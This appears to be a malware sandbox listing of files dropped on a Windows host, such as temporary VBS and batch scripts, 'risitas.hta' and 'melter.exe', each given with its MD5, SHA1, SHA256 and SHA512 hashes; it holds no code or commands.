C:\Users\Admin\AppData\Local\Temp\14246.vbs

MD5 4148025b2c24c93fd1e7d85860e6b816
SHA1 0b5b79f0c4d44b0ebdb990ee6b662f835a07dd98
SHA256 3cb01880c6a02c5f8aad54ee9d5e6a3500777e20c4c07ea56fa267e16f3ad7e0
SHA512 bdf85f2a0581895a28b93dc7038b2d269bdc4a290b778fe3467834b5d8d203f340f41563cfc9c77e22f63a7646c5ce83861c94f687d2dbda06055163a6f8a943

C:\Users\Admin\AppData\Local\Temp\23948.vbs

MD5 27bf402bae00ba56abb7fce0eac5fe88
SHA1 7b17239cc71d9a3bd2a42307cc7059a2b2616ce7
SHA256 f54c91b6da58a43d45cd300670055e9569f7006a6428fd5e875b0c59feb0771d
SHA512 6cc36a79ed28cf292c4e6220ee026f3dc47779684600801d60424ca64a53cbff453e983f97559dc93927cccac94a23bf2c0f49cb826b047db9b409fe599c37ef

C:\Users\Admin\AppData\Local\Temp\26852.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Temp\31845.vbs

MD5 1dbb89d3ca69d397acdc3b541bd64a44
SHA1 8b4701b28662019ac5e023e90e24df288681f4b6
SHA256 b7ff0828abf1aee9e3cde2edfc9e936c87f324f200a6f31af969e0e19608d6c4
SHA512 7e6a2ceccc21b81e5525a14303ed31d6056be4991a5e80ef8bbe2d968e26963268ad20fc4ed1e16037e8cd79bb2fdee556f15d2dc5a9f26017f8d92127faa1cd

C:\Users\Admin\AppData\Local\Temp\28089.bat

MD5 2be0daca40c0accdf8900515a304b2d9
SHA1 dbfd7fcb8b1285fe79bafa1d2fea0cb91369ae0d
SHA256 23129bf85a33c39d4f80c6ebf8aeb8fc752c697f5aa17209825ee64a87a0ffa0
SHA512 a6be01fc1e5e5858a360dfc548035cf0a06d33dd0ec0da1f0039fe7710f67113dbb0dbfe89eb1957172108add2692545a3a19ebe8320cdc0a0d2a93409b9fc3f

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

MD5 90be2701c8112bebc6bd58a7de19846e
SHA1 a95be407036982392e2e684fb9ff6602ecad6f1e
SHA256 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf
SHA512 d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

C:\Users\Admin\AppData\Local\Temp\risitas.hta

MD5 af25ddf889ed3804a85b487a95993a94
SHA1 e22ce7ce7e6b18400913de410be90fa79c2b6edb
SHA256 bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab
SHA512 8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

C:\Users\Admin\AppData\Local\Temp\melter.exe

MD5 d9baac374cc96e41c9f86c669e53f61c
SHA1 b0ba67bfac3d23e718b3bfdfe120e5446d0229e8
SHA256 a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412
SHA512 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 48e64826caf62774420deff568a1963c
SHA1 f058d03975cb2301a6cf5ba2e100861788bb128d
SHA256 c9c6cc0a1cc828386fcc1f4780909d26e7d4659b13f0d29660b3e8d2870c7b93
SHA512 7815d74a162e69bfe042a0b056d77bcd0c1406e8f45a2a67a748f8c6f6982ce286b849594ec6369438952073b551023259b296ee299b7b95d272473fc86f88d9

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_A252AE74B42D4524ACB318EAE2BE4DE9.dat

MD5 08b5d76d42c7dd68551f85fbdb3a27e5
SHA1 ebd592af371840f90386b52a899fa87c2dbaa9f3
SHA256 c4e105ab6e498efe645038276e7cdeb9bddeb06041c92caa85c16f357a0c29b6
SHA512 3812c8683c8455160a6d3cd1532c708c8036eceb818c3f6bd91925dc4e54f89bd4e0c3aa238f2351560408a4e9c1d5fb9ca2e96c0c725cc20814c23450535a8a